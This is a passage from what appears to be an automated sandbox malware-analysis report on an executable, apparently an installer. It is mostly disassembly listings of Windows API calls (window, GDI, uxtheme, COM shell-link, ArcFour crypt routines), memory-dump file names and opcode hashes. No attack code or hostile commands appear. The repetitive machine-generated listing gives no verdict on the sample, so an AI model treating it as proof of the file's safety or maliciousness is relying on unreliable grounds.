                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 3541575487-0
                                                                                                    • Opcode ID: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                                    • Instruction ID: e6acefadc91213b77ea930f6be1f86c6134c8588622ee3d3acab995ed1c325b6
                                                                                                    • Opcode Fuzzy Hash: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                                    • Instruction Fuzzy Hash: 87210831904B08BECB11EB65CC41ACEB7ACDB49304F5084B7E808E32A1F6789E44CE69
                                                                                                    APIs
                                                                                                    • IsIconic.USER32(?), ref: 004241E4
                                                                                                    • SetActiveWindow.USER32(?,?,?,0046CD53), ref: 004241F1
                                                                                                      • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                      • Part of subcall function 00423B14: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021125AC,0042420A,?,?,?,0046CD53), ref: 00423B4F
                                                                                                    • SetFocus.USER32(00000000,?,?,?,0046CD53), ref: 0042421E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ActiveFocusIconicShow
                                                                                                    • String ID:
                                                                                                    • API String ID: 649377781-0
                                                                                                    • Opcode ID: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                                    • Instruction ID: c953833529836f01456b8f788e47b4b7c36f7a841d6c6df07f57e62630513da6
                                                                                                    • Opcode Fuzzy Hash: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                                    • Instruction Fuzzy Hash: 8CF030B170012097CB10BFAAA8C5B9676A8AB48344F5500BBBD05DF357CA7CDC018778
                                                                                                    APIs
                                                                                                    • IsIconic.USER32(?), ref: 00417D0F
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                                    • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                                    • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Placement$Iconic
                                                                                                    • String ID:
                                                                                                    • API String ID: 568898626-0
                                                                                                    • Opcode ID: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                                    • Instruction ID: d9358ea7cd183770b33139a8ac7b7a0a70302bd2c01e5fc8313c3e2814ac7f2c
                                                                                                    • Opcode Fuzzy Hash: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                                    • Instruction Fuzzy Hash: 33012C71204108ABDB10EE59D8C1EF673A8AF45724F154566FD19DF242D639ED8087A8
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CaptureIconic
                                                                                                    • String ID:
                                                                                                    • API String ID: 2277910766-0
                                                                                                    • Opcode ID: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                                    • Instruction ID: 6cb7601519473143bf4e876ebf6758ccc8fc4fa751d6c6e0357a6193460a6b05
                                                                                                    • Opcode Fuzzy Hash: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                                    • Instruction Fuzzy Hash: 0AF0A4723056425BD730AB2EC984AB762F69F84314B14403BE419CBFA1EB3CDCC08798
                                                                                                    APIs
                                                                                                    • IsIconic.USER32(?), ref: 0042419B
                                                                                                      • Part of subcall function 00423A84: EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                                      • Part of subcall function 00423A84: GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                                      • Part of subcall function 00423A84: GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                                      • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                                    • SetActiveWindow.USER32(?,?,?,00423D73,00000000,0042415C), ref: 004241AF
                                                                                                      • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 2671590913-0
                                                                                                    • Opcode ID: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                                    • Instruction ID: ce5d4440ec1c13bcfda566247f28ea27228b22b89c70f7a48f218b5e8bc86154
                                                                                                    • Opcode Fuzzy Hash: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                                    • Instruction Fuzzy Hash: 55E01AA070011087DB10AFAADCC8B9632A9BB48304F55017ABD49CF35BD63CC8608724
                                                                                                    APIs
                                                                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127D5), ref: 004127C3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NtdllProc_Window
                                                                                                    • String ID:
                                                                                                    • API String ID: 4255912815-0
                                                                                                    • Opcode ID: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                                    • Instruction ID: 2c049f03cfb376e3baa0368465928f91904f6d03483072bf0e6cb5f6a46bccc5
                                                                                                    • Opcode Fuzzy Hash: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                                    • Instruction Fuzzy Hash: 4A5102357082048FD710DB6ADA80A9BF3E5EF98314B2082BBD814C77A1D7B8AD91C75D
                                                                                                    APIs
                                                                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478C0E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NtdllProc_Window
                                                                                                    • String ID:
                                                                                                    • API String ID: 4255912815-0
                                                                                                    • Opcode ID: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                                    • Instruction ID: 8fc52e73ba06cc46e730b07d7f7f94568764801a7b8f51cd1014d1f63996c257
                                                                                                    • Opcode Fuzzy Hash: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                                    • Instruction Fuzzy Hash: EC4148B5A44104DFCB10CF99C6888AAB7F5FB49310B64C99AF848DB701D738EE45DB58
                                                                                                    APIs
                                                                                                    • ArcFourCrypt._ISCRYPT(?,?,?,0046DEA4,?,?,0046DEA4,00000000), ref: 0045D247
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CryptFour
                                                                                                    • String ID:
                                                                                                    • API String ID: 2153018856-0
                                                                                                    • Opcode ID: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                                    • Instruction ID: 5effe0378c810cd07e0217cdc1e7a72ed78fe315a0c34b067f2c35eeb24cdbba
                                                                                                    • Opcode Fuzzy Hash: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                                    • Instruction Fuzzy Hash: D0C09BF200420CBF650057D5ECC9C77B75CE6586547408126F7048210195726C104574
                                                                                                    APIs
                                                                                                    • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DB14,?,0046DCF5), ref: 0045D25A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CryptFour
                                                                                                    • String ID:
                                                                                                    • API String ID: 2153018856-0
                                                                                                    • Opcode ID: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                                    • Instruction ID: 17600df93846144bfd8e61cd07b91608ca2a028cf3222f5d1774599e6ed580aa
                                                                                                    • Opcode Fuzzy Hash: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                                    • Instruction Fuzzy Hash: B7A002F0B80300BAFD2057F15E5EF26252C97D0F01F2084657306E90D085A56400853C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2617468297.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2617431242.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2617549147.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_10000000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                                    • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                                    • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                                    • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2617468297.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2617431242.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2617549147.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_10000000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                                    • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                                    • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    APIs
                                                                                                      • Part of subcall function 0044B604: GetVersionExA.KERNEL32(00000094), ref: 0044B621
                                                                                                    • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                                    • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                                    • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                                    • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C9
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7DB
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7ED
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7FF
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B811
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B823
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B835
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B847
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B859
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B86B
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B87D
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B88F
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8A1
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8B3
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8C5
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8D7
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E9
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8FB
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B90D
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B91F
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B931
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B943
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B955
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B967
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B979
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B98B
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B99D
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9AF
                                                                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9C1
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9D3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoadVersion
                                                                                                    • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                    • API String ID: 1968650500-2910565190
                                                                                                    • Opcode ID: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                                    • Instruction ID: e93aa9000a3b975727f71862fff1c9a8a52c50bca2d3d110ef64c9f3a3b13d35
                                                                                                    • Opcode Fuzzy Hash: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                                    • Instruction Fuzzy Hash: D391A8F0A40B11ABEB00EFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 0041CA40
                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 0041CA4C
                                                                                                    • CreateBitmap.GDI32(0041A944,?,00000001,00000001,00000000), ref: 0041CA70
                                                                                                    • CreateCompatibleBitmap.GDI32(?,0041A944,?), ref: 0041CA80
                                                                                                    • SelectObject.GDI32(0041CE3C,00000000), ref: 0041CA9B
                                                                                                    • FillRect.USER32(0041CE3C,?,?), ref: 0041CAD6
                                                                                                    • SetTextColor.GDI32(0041CE3C,00000000), ref: 0041CAEB
                                                                                                    • SetBkColor.GDI32(0041CE3C,00000000), ref: 0041CB02
                                                                                                    • PatBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00FF0062), ref: 0041CB18
                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 0041CB2B
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0041CB5C
                                                                                                    • SelectPalette.GDI32(00000000,00000000,00000001), ref: 0041CB74
                                                                                                    • RealizePalette.GDI32(00000000), ref: 0041CB7D
                                                                                                    • SelectPalette.GDI32(0041CE3C,00000000,00000001), ref: 0041CB8C
                                                                                                    • RealizePalette.GDI32(0041CE3C), ref: 0041CB95
                                                                                                    • SetTextColor.GDI32(00000000,00000000), ref: 0041CBAE
                                                                                                    • SetBkColor.GDI32(00000000,00000000), ref: 0041CBC5
                                                                                                    • BitBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00000000,00000000,00000000,00CC0020), ref: 0041CBE1
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 0041CBEE
                                                                                                    • DeleteDC.GDI32(00000000), ref: 0041CC04
                                                                                                      • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ColorSelect$CreatePalette$CompatibleObject$BitmapRealizeText$DeleteFillRect
                                                                                                    • String ID:
                                                                                                    • API String ID: 269503290-0
                                                                                                    • Opcode ID: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                                    • Instruction ID: 91afdf38925dfcc0a19aef53af63d8b93a06df8cfedaf367688fa0d34ebdb442
                                                                                                    • Opcode Fuzzy Hash: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                                    • Instruction Fuzzy Hash: 01610071A44648AFDF10EBE9DC86FDFB7B8EB48704F10446AB504E7281D67CA940CB68
                                                                                                    APIs
                                                                                                    • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,004569E3), ref: 0045667E
                                                                                                    • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,004569E3), ref: 004566A4
                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0045685B
                                                                                                    Strings
                                                                                                    • CoCreateInstance, xrefs: 004566AF
                                                                                                    • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456840
                                                                                                    • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456892
                                                                                                    • IPropertyStore::Commit, xrefs: 004568E3
                                                                                                    • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 00456904
                                                                                                    • %ProgramFiles(x86)%\, xrefs: 0045672E
                                                                                                    • IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption), xrefs: 004568CA
                                                                                                    • {pf32}\, xrefs: 0045671E
